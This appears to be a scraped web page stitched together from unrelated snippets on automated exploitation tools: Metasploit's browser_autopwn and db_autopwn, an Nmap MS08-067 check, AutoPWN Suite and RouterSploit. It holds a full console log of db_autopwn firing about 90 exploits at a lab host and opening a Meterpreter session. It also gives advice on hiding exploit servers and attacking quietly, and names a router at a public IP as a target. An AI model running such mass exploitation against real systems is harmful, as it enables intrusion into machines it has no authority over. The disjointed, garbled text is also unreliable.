We can see we loaded the browser_autopwn module residing at auxiliary/server/browser_autpown2 successfully in Metasploit. To launch the attack, we need to specify LHOST, URIPATH, and SRVPORT. SRVPORT is the port on which our exploit server base will run. It is recommended to use port 80 or 443, since the addition of port numbers to the URL catch many eyes and looks fishy. URIPATH is the directory path for the various exploits, and should be kept in the root ...

It's like a smarter db_autopwn. Hail Mary finds recommended exploits for your targets, filters them using the OS info of your target, and then sorts the exploits into an optimal order. These exploits are then launched as one big volley at your target.

metasploit |nmap db autopwn

I open a terminal in kali linux and I type "ifconfig" and it shows an IP address like 10.0.2.15 instead of 192.168.1.xxx, so after that when I start another terminal, to use an autopwn2 bot here's what I do.

See the documentation for the smbauth library. randomseed, smbbasic, smbport, smbsign See the documentation for the smb library. vulns.short, vulns.showall See the documentation for the vulns library. Example Usage nmap --script smb-vuln-ms08-067.nse -p445 nmap -sU --script smb-vuln-ms08-067.nse -p U:137 Script Output smb-vuln-ms08-067: VULNERABLE: Microsoft Windows system vulnerable to remote code execution (MS08-067) State: VULNERABLE IDs: CVE:CVE-2008-4250 The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary code via a crafted RPC request that triggers the overflow during path canonicalization. Disclosure date: 2008-10-23 References: -us/library/security/ms08-067.aspx_ -bin/cvename.cgi?name=CVE-2008-4250 Requires msrpc smb string vulns Authors:Ron BowesJiayi YePaulino Calderon License: Same as Nmap--See -legal.html

Metasploit provides functionality to automate exploitation via the autopwn command[1]. When you write a module, there are certain requirements for it to be used within the autopwn routine.

This method is responsible for determining the correct target when used for automated exploitation. In the future, this method will be able to query the database to look for target-specific information about the target. The autofilter method can set the TARGET datastore value along with any other common parameters. As long as the final return value is true, the module will be executed as part of autopwn.

For the sake of a quick how to, I'm just going to show you how to use the db_nmap feature which automatically adds all the port scan details to the database with your host. Then we'll breifly run through matching exploits from the db.

Something else I would like to point out is the difference between the db_nmap vs using a Nessus scan output. The Nessus output is much more accurate in terms of applied attacks since these scan files include CVE info, with this the autopwn feature can select only those exploits, rather than all exploits that match the open port as the Nmap scan will. This is important if you are trying to run an automated attack without being too loud. It is also somewhat sloppy to fire off 50 port 21 exploits, when are sure only 1 of your exploits in framework may work.

AutoPWN Suite uses nmap TCP-SYN scan to enumerate the host and detect the version of softwares running on it. After gathering enough information about the host, AutoPWN Suite automatically generates a list of "keywords" to search NIST vulnerability database.

The AMES tool passes the new style .nessus xml file output from Nessus scanning software, it will then locate any exploit based on the CVE reported. The Tool will then build a selection of command lines that the user can easily copy and paste to use. Since metasploit removed the autopwn feature this is as point and click exploit that can be used.

=[ metasploit v3.3-testing [core:3.3 api:1.0] + -- --=[ 444 exploits - 216 auxiliary + -- --=[ 190 payloads - 21 encoders - 8 nops =[ svn r7521 updated today (2009.11.15) msf >

With Metasploit started, I decided to use the db_autopwn functionality to almost completely automate exploitation of the target. I create a sqlite3 database, tell Metasploit to scan the target with Nmap, then use db_autopwn to exploit the target.

msf > db_create [*] Creating a new database instance... [*] Successfully connected to the database [*] File: /home/richard/.msf3/sqlite3.db msf > db_connect [*] Successfully connected to the database [*] File: /home/richard/.msf3/sqlite3.db msf > db_nmap 192.168.199.128 Starting Nmap 4.53 ( ) at 2009-11-15 14:37 EST Interesting ports on 192.168.199.128: Not shown: 1710 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-term-serv MAC Address: 00:0C:29:23:94:DD (VMware) Nmap done: 1 IP address (1 host up) scanned in 1.642 seconds msf > db_autopwn [*] Usage: db_autopwn [options] -h Display this help text -t Show all matching exploit modules -x Select modules based on vulnerability references -p Select modules based on open ports -e Launch exploits against all matched targets -r Use a reverse connect shell -b Use a bind shell on a random port (default) -q Disable exploit module output -I [range] Only exploit hosts inside this range -X [range] Always exclude hosts inside this range -PI [range] Only exploit hosts with these ports open -PX [range] Always exclude hosts with these ports open -m [regex] Only run modules whose name matches the regex msf > db_autopwn -e -p [*] (6/90): Launching exploit/netware/smb/lsass_cifs against 192.168.199.128:139... ...edited... [*] (82/90): Launching exploit/windows/smb/ms04_011_lsass against 192.168.199.128:139... [*] Started bind handler [*] (83/90): Launching exploit/windows/smb/ms08_067_netapi against 192.168.199.128:445... [*] Started bind handler [*] Job limit reached, waiting on modules to finish... [-] Exploit failed: Login Failed: The server responded with unimplemented command 0 with WordCount 0 [*] Binding to 6bffd098-a112-3610-9833 -46c3f87e345a:[email protected]_np:192.168.199.128[\BROWSER] ... [*] Bound to 6bffd098-a112-3610-9833- 46c3f87e345a:[email protected]_np:192.168.199.128[\BROWSER] ... [*] Building the stub data... [*] Calling the vulnerable function... [*] Started bind handler [*] (89/90): Launching exploit/windows/smb/ms04_011_lsass against 192.168.199.128:445... [*] Automatically detecting the target... [*] Started bind handler [*] Binding to 3919286a-b10c-11d0-9ba8 -00c04fd92ef5:[email protected]_np:192.168.199.128[\lsarpc]... [-] Exploit failed: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0) msf > [*] Fingerprint: Windows XP Service Pack 2 - lang:English [*] Selected Target: Windows XP SP2 English (NX) [*] Triggering the vulnerability... [*] Sending stage (719360 bytes) [*] Meterpreter session 1 opened (192.168.199.1:35634 -> 192.168.199.128:28616) msf > sessions Active sessions =============== Id Description Tunnel -- ----------- ------ 1 Meterpreter 192.168.199.1:35634 -> 192.168.199.128:28616

As Listing 7 shows, Metasploit now automatically runs the mysql-login scan against all listed hosts and also finds the vulnerable root account without a password. All other cases have dictionaries for a password attack on /usr/share/metasploit-framework/data/wordlists. You can apply them by typing:

A rudimentary automation is still present in RouterSploit. You can at least check one router for exposure to all exploits at once. For this there is an autopwn module . As a test router, we will take a router on IP 83.17.188.82 and on port 80.

Metasploit Armitage is the GUI version of the famous Metasploit framework. We did an entire series of Metasploit tutorials on this site last month. In this part of BackTrack 5 guide, we will look at the browser autopwn exploit for Windows XP using Metasploit Armitage.

The screenshot above shows that we are logged in and we add a file on C:Documents and SettingswinautopwnDesktopwinautopwn.txt using the shell which we gained. It reflects instantly on the compromised system in the RDesktop interface.

use a Nessus results import to target a system and autopwn it. Create a new database with db_connect and use db_import to import the scan report. In the next example, we run db_autopwn with a series of switches to launch attacks against all targets (e), show all matching modules (t), use a reverse shell payload (r), select exploit modules based on vulnerability (x), and also select based on open ports (p). 2ff7e9595c